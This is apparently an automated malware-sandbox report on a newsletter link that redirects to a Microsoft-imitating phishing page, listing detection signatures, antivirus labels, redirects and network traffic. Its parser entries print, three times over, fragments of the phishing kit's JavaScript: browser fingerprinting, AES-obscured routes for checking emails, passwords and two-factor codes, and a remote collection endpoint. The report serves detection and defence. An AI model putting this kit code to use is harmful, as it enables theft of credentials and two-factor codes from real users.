Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4

Overview

General Information

Sample URL: https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCc
Analysis ID: 1467205
Infos:

Detection

HTMLPhisher
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection

barindex
Source: https://ysh.logentr.com/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 Avira URL Cloud: Label: malware
Source: https://rfwai.elixir85.com/RfWAi/ Avira URL Cloud: Label: malware
Source: https://RfWAi.elixir85.com/RfWAi/#X Avira URL Cloud: Label: malware
Source: https://rfwai.elixir85.com/RfWAi/?vXalysa.a@centurybizsolutions.com Avira URL Cloud: Label: malware
Source: https://zichd.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN Avira URL Cloud: Label: malware

Phishing

barindex
Source: https://rfwai.elixir85.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the URL structure and the use of a subdomain (rfwai.elixir85.com) are suspicious and often used in phishing attacks to mislead users. The image resembles a legitimate Microsoft login page, which is a social engineering technique to gain user trust. There is no CAPTCHA present, which is often a feature in legitimate login pages to prevent automated attacks. The link 'Create one!' and 'Can't access your account?' are suspicious as they may lead to further phishing attempts. DOM: 3.5.pages.csv
Source: https://rfwai.elixir85.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the domain 'elixir85.com' is suspicious and not associated with Microsoft. The use of social engineering techniques is evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials. There is no CAPTCHA present, which is often used in legitimate sites to prevent automated attacks. The combination of these factors strongly indicates that this is a phishing site. DOM: 3.6.pages.csv
Source: https://rfwai.elixir85.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The presence of a prominent login form on a suspicious domain is a common phishing technique. Additionally, the URL uses a subdomain that does not relate to Microsoft, which is another red flag. The site attempts to mimic the Microsoft login page, which is a social engineering technique to mislead users into entering their credentials. The presence of suspicious links such as 'No account? Create one!' and 'Can't access your account?' further indicates phishing attempts. DOM: 3.7.pages.csv
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
Source: Yara match File source: 4.8.pages.csv, type: HTML
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Matcher: Template: microsoft matched
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Matcher: Template: microsoft matched
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw Matcher: Template: microsoft matched
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw# Matcher: Template: microsoft matched
Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.com Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal Matcher: Template: captcha matched
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Number of links: 0
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.com HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Title: Financial Modeling does not match URL
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Terms of use
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Privacy & cookies
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Terms of use
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Privacy & cookies
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Terms of use
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: Invalid link: Privacy & cookies
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: <input type="password" .../> found
Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.com HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal HTTP Parser: No favicon
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No favicon
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No favicon
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No favicon
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="author".. found
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="author".. found
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="author".. found
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="copyright".. found
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="copyright".. found
Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49747 version: TLS 1.0
Source: unknown HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: global traffic TCP traffic: 192.168.2.5:49723 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: link.mail.beehiiv.com to https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49747 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.4
Source: global traffic HTTP traffic detected: GET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=IQ0kDKqsds0puoNbwl0LyUop2u8_fh4BRK0xcf65ZTM-1720033597-1.0.1.1-Tcc3DGThDR1gfTg7hvqQjB7YpHod4J4GL.JzRTX.pG4CYA4UhSlW62sqlRLkzt.0xW_kV3MuTbqb6L17ejXJdg
